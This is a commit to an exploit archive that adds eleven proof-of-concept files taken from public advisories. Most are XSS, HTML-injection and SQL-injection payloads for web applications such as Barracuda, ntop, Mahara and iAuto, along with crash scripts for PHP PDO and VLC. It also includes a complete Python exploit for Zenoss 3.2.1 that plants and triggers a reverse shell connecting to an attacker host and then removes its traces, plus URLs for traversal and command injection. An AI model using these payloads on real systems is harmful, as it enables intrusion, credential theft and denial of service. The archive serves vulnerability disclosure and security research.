DB: 2015-07-12

11 new exploits
2015-07-12 05:03:09 +00:00 · 2015-07-12 05:03:09 +00:00 · 5df0c9137c
commit 5df0c9137c
parent e8f22fe4b6
12 changed files with 497 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -33775,6 +33775,8 @@ id,file,description,date,author,platform,type,port
 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37565,platforms/php/webapps/37565.txt,"Mahara <= 1.4.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0
+37566,platforms/php/dos/37566.php,"PHP <= 5.4.3 PDO Memory Access Violation Denial of Service Vulnerability",2012-08-02,0x721427D8,php,dos,0
 37497,platforms/php/webapps/37497.txt,"Flogr 'tag' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0
 37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
@ -33789,6 +33791,7 @@ id,file,description,date,author,platform,type,port
 37434,platforms/php/webapps/37434.txt,"e107 FileDownload Plugin Arbitrary File Upload and Remote File Disclosure Vulnerabilities",2012-06-19,"Sammy FORGIT",php,webapps,0
 37435,platforms/php/webapps/37435.txt,"web@all Cross Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps,0
 37436,platforms/php/webapps/37436.txt,"Commentics 'index.php' Cross Site Scripting Vulnerability",2012-06-20,"Jean Pascal Pereira",php,webapps,0
+37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0
 37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery 'index.php' Script SQL Injection Vulnerability",2012-06-20,"Taurus Omar",php,webapps,0
 37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross Site Scripting Vulnerability",2012-06-21,"Sooraj K.S",php,webapps,0
 37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,"John Page",php,webapps,80
@ -33841,6 +33844,7 @@ id,file,description,date,author,platform,type,port
 37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
 37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0
+37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin SQL Injection Vulnerability",2012-08-01,BEASTIAN,php,webapps,0
 37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
 37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
@ -33874,7 +33878,6 @@ id,file,description,date,author,platform,type,port
 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
-37529,platforms/php/webapps/37529.txt,"WordPress MDC YouTube Downloader Plugin 2.1.0 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0
 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
@ -33903,3 +33906,10 @@ id,file,description,date,author,platform,type,port
 37559,platforms/php/webapps/37559.txt,"Wordpress CP Image Store with Slideshow Plugin 1.0.5 Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
 37560,platforms/php/webapps/37560.txt,"Wordpress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
 37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123
+37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b 'link.php' SQL Injection Vulnerability",2012-08-01,Socket_0x03,php,webapps,0
+37568,platforms/windows/dos/37568.pl,"VLC Media Player '.3gp' File Divide-By-Zero Denial of Service Vulnerability",2012-08-02,Dark-Puzzle,windows,dos,0
+37569,platforms/multiple/webapps/37569.txt,"ntop 'arbfile' Parameter Cross Site Scripting Vulnerability",2012-08-03,"Marcos Garcia",multiple,webapps,0
+37570,platforms/multiple/webapps/37570.py,"Zenoss <= 3.2.1 Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0
+37571,platforms/multiple/webapps/37571.txt,"Zenoss <= 3.2.1 Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0
+37572,platforms/php/webapps/37572.txt,"Elefant CMS 'id' Parameter Cross Site Scripting Vulnerability",2012-08-03,PuN!Sh3r,php,webapps,0
+37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0
--- a/platforms/hardware/remote/37564.txt
+++ b/platforms/hardware/remote/37564.txt
@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/54773/info
+
+Barracuda Email Security Service is prone to multiple HTML-injection vulnerabilities because it fails to properly validate user-supplied input.
+
+An attacker may leverage these issues to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
+
+Barracuda Email Security Service 2.0.2 is vulnerable; other versions may also be affected. 
+
+Proof of Concept:
+=================
+1.1
+The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
+For demonstration or reproduce ...
+
+Review:  Domain Settings > Directory Services > LDAP Host
+
+<div id="directory-services" class="module">
+        <h4 class="module-title">Directory Services</h4>
+        <div class="module-content">
+          <div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif" 
+alt="loading..."> Connecting to >"<iframe src="http://www.example1.com">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>    
+          <div style="float: right;">
+            <a href="https://www.example2.com/domains/sync_ldap/4" class="btn"><span><span>Synchronize Now</span></span></a>
+            <a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
+          </div>
+          <p class="field">
+            <label class="label" for="ldap_host">LDAP Host:</label>
+            <input name="ldap_host" id="ldap_host" size="30" value=">
+"<iframe src=http://www.example1.com>@gmail.com >"<script>alert(document.cookie)</script><
+div style="1@gmail.com 0" type="text">
+
+URL:   https://www.example.com/domains/info/4
+
+PoC: >">"<iframe src=http://www.example1.com>VL >"<div style="1 >">"
+
+Note:
+To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
+The mask of the exception (>") will be bypassed and the string will be executed out of the secure exception handling message.
+
+
+
+1.2
+The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
+For demonstration or reproduce ...
+
+Vulnerable Module: Reports > Date Start > Date End
+
+PoC: >"<iframe src=http://www.example1.com>
+
+URL: https://www.example.com/reports
+
+Note:
+1. Include a start Date & End Date
+2. Inject after the start date & end date your own persistent script code
+3. Result: The script code get executed out of the date listing application context
+4. Save value with script code to events for exploitation via module.
--- a/platforms/multiple/webapps/37569.txt
+++ b/platforms/multiple/webapps/37569.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54792/info
+
+ntop is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ntop 4.0.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/plugins/rrdPlugin?action=arbreq&which=graph&arbfile=TEST">[XSS]&arbiface=eth0&start=1343344529&end=1343348129&counter=&title=Active+End+Nodes&mode=zoom 
--- a/platforms/multiple/webapps/37570.py
+++ b/platforms/multiple/webapps/37570.py
@ -0,0 +1,182 @@
+source: http://www.securityfocus.com/bid/54793/info
+
+Zenoss is prone to the following security vulnerabilities:
+
+1. Multiple arbitrary command-execution vulnerabilities
+2. Multiple HTML-injection vulnerabilities
+3. An open-redirection vulnerability
+4. Multiple directory-traversal vulnerabilities
+5. Multiple information-disclosure vulnerabilities
+6. A code-execution vulnerability
+
+An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information.
+
+Zenoss 3.2.1 and prior are vulnerable.
+
+# Zenoss <= 3.2.1 Remote Post-Authentication Command Execution #################
+# o Requires:     Credentials for a user with "ZenManager" or "Manager" roles.
+# o Tested:       Zenoss 3.2.1
+# o Default port: 8080
+# Brendan Coles <bcoles at gmail dot com> # 2012-03-14
+################################################################################
+import socket, sys, random, time, re
+#verbose = True
+verbose = False
+
+# usage
+if len(sys.argv) < 6:
+	print "Zenoss <= 3.2.1 Remote Post-Authentication Command Execution"
+	print "[*] Usage: python "+sys.argv[0]+" <RHOST> <RPORT> <username> <password> <LHOST> <LPORT>"
+	print "[*] Example: python "+sys.argv[0]+" 192.168.1.10 8080 zenoss zenoss 192.168.1.1 4444"
+	sys.exit(0)
+
+# zenoss details
+RHOST    = sys.argv[1]
+RPORT    = int(sys.argv[2])
+username = sys.argv[3]
+password = sys.argv[4]
+
+# reverse shell
+LHOST    = sys.argv[5]
+LPORT    = int(sys.argv[6])
+
+# random file name
+filename = ""
+for i in range(0,random.randint(10,20)):
+	filename = filename+chr(random.randint(97,122))
+
+# connect to RHOST:RPORT
+try:
+	socket.inet_aton(RHOST)
+except socket.error:
+	print "[-] Error: Could not create socket."
+	sys.exit(1)
+try:
+	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+	s.connect((RHOST,RPORT))
+except:
+	print "[-] Error: Could not connect to server"
+	sys.exit(1)
+
+
+# Login and get cookie
+if verbose: print "[*] Logging in"
+request = "GET /zport/acl_users/cookieAuthHelper/login?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
+try:
+	# send request
+	s.sendto(request, (RHOST, RPORT))
+	data = s.recv(1024)
+	if verbose: print str(data)+"\r\n"
+	# get ginger cookie
+	m = re.search('(__ginger_snap=".+";)', data)
+	if not m:
+		raise Exception("[-] Error: Could not retrieve __ginger_snap cookie value")
+	else:
+		ginger_cookie = str(m.group(1))
+except:
+	print "[-] Error: Login failed"
+	sys.exit(1)
+
+
+# Add empty command to web interface
+if verbose: print "[*] Adding command to Zenoss"
+request = "GET /zport/dmd/ZenEventManager/commands/?id="+filename+"&manage_addCommand%3Amethod=+Add+&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
+try:
+	# send request
+	s.sendto(request, (RHOST, RPORT))
+	data = s.recv(1024)
+	if verbose: print str(data)+"\r\n"
+	m = re.search('(Bobo-Exception-Type: Unauthorized)', data)
+	if m: raise Exception("[-] Error: Incorrect username/password")
+	else: print "[+] Added command to Zenoss successfully"
+except:
+	print "[-] Error: Adding command to Zenoss failed"
+	sys.exit(1)
+
+
+# Wait for command to be saved
+wait = 5
+if verbose: print "[*] Waiting "+str(wait)+" seconds"
+time.sleep(wait)
+
+
+# Edit command to drop a python reverse shell request in /tmp/
+if verbose: print "[*] Updating command with payload"
+postdata = "zenScreenName=editEventCommand.pt&enabled%3Aboolean=True&defaultTimeout%3Aint=60&delay%3Aint=1&repeatTime%3Aint=15&command=echo+%22import+socket%2Csubprocess%2Cos%3Bhost%3D%5C%22"+LHOST+"%5C%22%3Bport%3D"+str(LPORT)+"%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28host%2Cport%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B+os.dup2%28s.fileno%28%29%2C1%29%3B+os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fsh%5C%22%2C%5C%22-i%5C%22%5D%29%3B%22+%3E+%2Ftmp%2F"+filename+".py%20%26%26%20chmod%20%2bx%20%2Ftmp%2F"+filename+".py%20%26%26%20python%20%2Ftmp%2F"+filename+".py&clearCommand=&add_filter=&manage_editEventCommand%3Amethod=+Save+"
+request = "POST /zport/dmd/ZenEventManager/commands/"+filename+"?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(postdata))+"\r\n\r\n"+postdata
+try:
+	# send request
+	s.sendto(request, (RHOST, RPORT))
+	data = s.recv(1024)
+	if verbose: print str(data)+"\r\n"
+	# get zope cookie
+	m = re.search('(_ZopeId=".+";)', data)
+	if not m: raise Exception("[-] Error: Could not retrieve _ZopeId cookie value")
+	else:
+		zope_cookie = str(m.group(1))
+		print "[+] Sent payload successfully"
+except:
+	print "[-] Error: Sending payload failed"
+	sys.exit(1)
+
+
+# Wait for command to be saved
+wait = 5
+if verbose: print "[*] Waiting "+str(wait)+" seconds"
+time.sleep(wait)
+
+
+# Send trigger event and get event id
+if verbose: print "[*] Sending trigger event"
+postdata = '{"action":"EventsRouter","method":"add_event","data":[{"summary":"'+filename+'","device":"'+filename+'","component":"'+filename+'","severity":"Info","evclasskey":"","evclass":""}],"type":"rpc","tid":0}'
+request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata
+try:
+	# send request
+	s.sendto(request, (RHOST, RPORT))
+	data = s.recv(1024)
+	if verbose: print str(data)+"\r\n"
+	# get trigger event id "evid"
+	m = re.search('"evid": "(.+)"', data)
+	evid = ""
+	if not m: raise Exception("[-] Error: Sending trigger event failed")
+	else:
+		evid = str(m.group(1))
+		print "[+] Sent trigger event successfully"
+except:
+	print "[-] Error: Sending trigger event failed"
+
+
+# Wait for command to execute
+wait = 60
+if verbose: print "[*] Waiting "+str(wait)+" seconds"
+time.sleep(wait)
+
+
+# Delete trigger from web interface
+if verbose: print "[*] Deleting the trigger"
+postdata = '{"action":"EventsRouter","method":"close","data":[{"evids":["'+evid+'"],"excludeIds":{},"selectState":null,"field":"component","direction":"ASC","params":"{\\"severity\\":[5,4,3,2],\\"eventState\\":[0,1]}","asof":0}],"type":"rpc","tid":0}'
+request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata
+try:
+	# send request
+	s.sendto(request, (RHOST, RPORT))
+	data = s.recv(1024)
+	if verbose: print str(data)+"\r\n"
+	print "[+] Deleted trigger successfully"
+except:
+	print "[-] Error: Deleting trigger failed"
+
+
+# Delete command from web interface
+if verbose: print "[*] Deleting the command from Zenoss"
+request = "GET /zport/dmd/ZenEventManager?zenScreenName=listEventCommands&redirect=false&ids%3Alist="+filename+"&id=&manage_deleteCommands%3Amethod=Delete&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
+try:
+	s.sendto(request, (RHOST, RPORT))
+	data = s.recv(1024)
+	if verbose: print str(data)+"\r\n"
+	print "[+] Deleted command from Zenoss successfully"
+except:
+	print "[-] Error: Deleting command failed"
+
+print "[+] You should now have a reverse shell at "+LHOST+":"+str(LPORT)
+print "[+] Don't forget to delete /tmp/"+filename+".py"
+
--- a/platforms/multiple/webapps/37571.txt
+++ b/platforms/multiple/webapps/37571.txt
@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/54793/info
+ 
+Zenoss is prone to the following security vulnerabilities:
+ 
+1. Multiple arbitrary command-execution vulnerabilities
+2. Multiple HTML-injection vulnerabilities
+3. An open-redirection vulnerability
+4. Multiple directory-traversal vulnerabilities
+5. Multiple information-disclosure vulnerabilities
+6. A code-execution vulnerability
+ 
+An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information.
+ 
+Zenoss 3.2.1 and prior are vulnerable.
+
+http://www.example.com/zport/About/showDaemonXMLConfig?daemon=uname%20-a%26
+http://www.example.com/zport/dmd/Events/Users/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
+http://www.example.com/zport/dmd/Events/Users/eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
+http://www.example.com/zport/dmd/Events/Status/Snmp/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence="><script>alert(document.cookie)</script><"
+http://www.example.com/zport/dmd/ZenEventManager/listEventCommands?tableName=eventCommands&sortedHeader=primarySortKey&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
+http://www.example.com/zport/dmd/backupInfo?tableName=backupTable&sortedHeader=fileName&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script>
+http://www.example.com/zport/acl_users/cookieAuthHelper/login?came_from=http%3a//example%2ecom/%3f
+http://www.example.com/zport/About/viewDaemonLog?daemon=../../../var/log/mysqld
+http://www.example.com/zport/About/viewDaemonConfig?daemon=../../../../etc/syslog
+http://www.example.com/zport/About/editDaemonConfig?daemon=../../../../etc/syslog
+http://www.example.com/zport/RenderServer/plugin?name=../../../../../../tmp/arbitrary-python-file
+http://www.example.com/zport/dmd/ZenEventManager
+http://www.example.com/manage
+
+
--- a/platforms/multiple/webapps/37573.txt
+++ b/platforms/multiple/webapps/37573.txt
@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/54812/info
+
+Worksforweb iAuto is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 
+
+Review:  Add Comments - Listing
+
+<div class="addComment">
+<h1>Reply to The Comment</h1>
+<div class="pageDescription">
+<div class="commentInfo">You are replying to the comment 
+#"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' 
+<="" to="" 
+listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span>
+<span class="fieldValue fieldValueMake">Acura</span> 
+
+
+
+1.2
+The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired 
+user inter action.
+Fo demonstration or reproduce ...
+
+String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <
+
+Dealer > Search Sellers > City
+
+PoC:
+http://www.example.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
+width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search
+
+
+Browse by Make and Model / AC Cobra / >
+
+PoC:
+http://www.example.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
+width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/
+
+
+Comments > Reply to The Comment > Topic & Text (commentSid)
+
+PoC:
+http://www.example.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
+%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
+
--- a/platforms/php/dos/37566.php
+++ b/platforms/php/dos/37566.php
@ -0,0 +1,98 @@
+source: http://www.securityfocus.com/bid/54777/info
+
+PHP is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.
+
+PHP 5.4.3 is vulnerable; other versions may also be affected. 
+
+<?php
+ try {
+ $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
+ //tokens: 
+ // SELECT;*;from;'user';/*
+ //$sql = "SELECT * from 'user'/*";
+ $stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query']));
+ $stmt->execute();
+ //crash
+ $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
+ $stmt->fetch(PDO::FETCH_BOUND);
+ print_r( $type);
+ }
+ catch (Exception $e)
+ {
+ echo "Failed: " . $e->getMessage();
+ }
+ ?>
+ -----
+ <?php
+try {
+$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
+
+//tokens:
+// SELECT;*;from;'user';/* 
+$sql = ":/*";
+
+$stmt = $db->prepare($sql);
+$stmt->execute();     // crashes php worker in pdo_parse_params()
+
+$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
+$stmt->fetch(PDO::FETCH_BOUND);
+print_r( $type);
+
+} catch (Exception $e) {
+  echo "Failed: " . $e->getMessage();
+}
+
+?>
+---
+
+<pre>
+<?php
+echo "hmm beginning\n";
+try {
+$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
+echo "lets get it on\n";
+//tokens:
+// SELECT;*;from;'user';/* 
+$sql = "SELECT * from user :/**";
+echo $sql;
+$stmt = $db->prepare($sql);
+echo "prepared :)\n";
+print_r($stmt);
+$stmt->execute();     // crashes php worker in pdo_parse_params()
+print_r($stmt);
+echo "executed :(\n";
+$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
+$stmt->fetch(PDO::FETCH_BOUND);
+echo "--data-\n";
+print_r( $type);
+echo "--data--\n";
+
+} catch (Exception $e) {
+        echo "EXCEPTION";
+  echo "Failed: " . $e->getMessage();
+}
+echo "hmmm end\n";
+?>
+</pre>
+
+Actual result:
+--------------
+root@bt:/opt/lampp# gdb ./bin/php 
+(gdb) run poc_pdo_linux_short_1.php
+Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php
+[Thread debugging using libthread_db enabled]
+
+Program received signal SIGSEGV, Segmentation fault.
+0x08228a81 in ?? ()
+(gdb) bt
+#0  0x08228a81 in ?? ()
+#1  0x082280eb in pdo_parse_params ()
+#2  0x08223891 in ?? ()
+#3  0x084b2aad in ?? ()
+#4  0x084b1f87 in execute ()
+#5  0x08490ed2 in zend_execute_scripts ()
+#6  0x0843f13c in php_execute_script ()
+#7  0x08506b46 in main ()
+
--- a/platforms/php/webapps/37563.html
+++ b/platforms/php/webapps/37563.html
@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/54767/info
+
+G-Lock Double Opt-in Manager plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+G-Lock Double Opt-in Manager 2.6.2 and prior versions are vulnerable. 
+
+<html>
+<form method="post" action="http://myserver/wp-admin/admin-ajax.php">
+<input type="text" name="action" value="gsom_aj_delete_subscriber">
+<input type="text" name="json" value="["intId or 1=1"]">
+<input type="text" name="_" value="">
+<input type="submit">
+</form>
+</html>
--- a/platforms/php/webapps/37565.txt
+++ b/platforms/php/webapps/37565.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54776/info
+
+Mahara is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied text.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Mahara versions prior to 1.5.2 and prior to 1.4.3 are vulnerable. 
+
+ http://www.example.com/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/changeuser.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
+
+
--- a/platforms/php/webapps/37567.txt
+++ b/platforms/php/webapps/37567.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54786/info
+
+tekno.Portal is prone to an SQL-injection vulnerability.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+tekno.Portal 0.1b is vulnerable; other versions may also be affected. 
+
+ http://www.example.com/teknoportal/link.php?kat=[Blind SQL Injection] 
--- a/platforms/php/webapps/37572.txt
+++ b/platforms/php/webapps/37572.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54805/info
+
+Elefant CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Elefant CMS 1.2.0 is vulnerable; other versions may also be affected. 
+
+ http://www.example.com/admin/versions?id=[XSS]&type=Webpage 
--- a/platforms/windows/dos/37568.pl
+++ b/platforms/windows/dos/37568.pl
@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/54791/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+VLC Media Player 2.0.2 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+my $a ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
+my $b ="\x00\x00\x00\xnn\x66\x74\x79\x70\x33\x67\x70";
+my $c ="\x62\x6\x74\x77\x65\x65\x6e\x20\x74\x68\x65\x20\x68\x65\x61\x64\x65\x72\x20\x61\x6e\x64\x20\x74\x68\x65\x20\x66\x6f\x6f\x74\x65\x72\x20\x74\x68\x65\x72\x65\x27\x73\x20\x64\x61\x72\x6b\x2d\x70\x75\x7a\x7a\x6c\x65";
+my $d ="\x33\x67\x70";
+ 
+
+my $file = "darkpuzzle.3gp";
+
+open ($File, ">$file");
+print $File $a,$b,$c,$d;
+close ($File);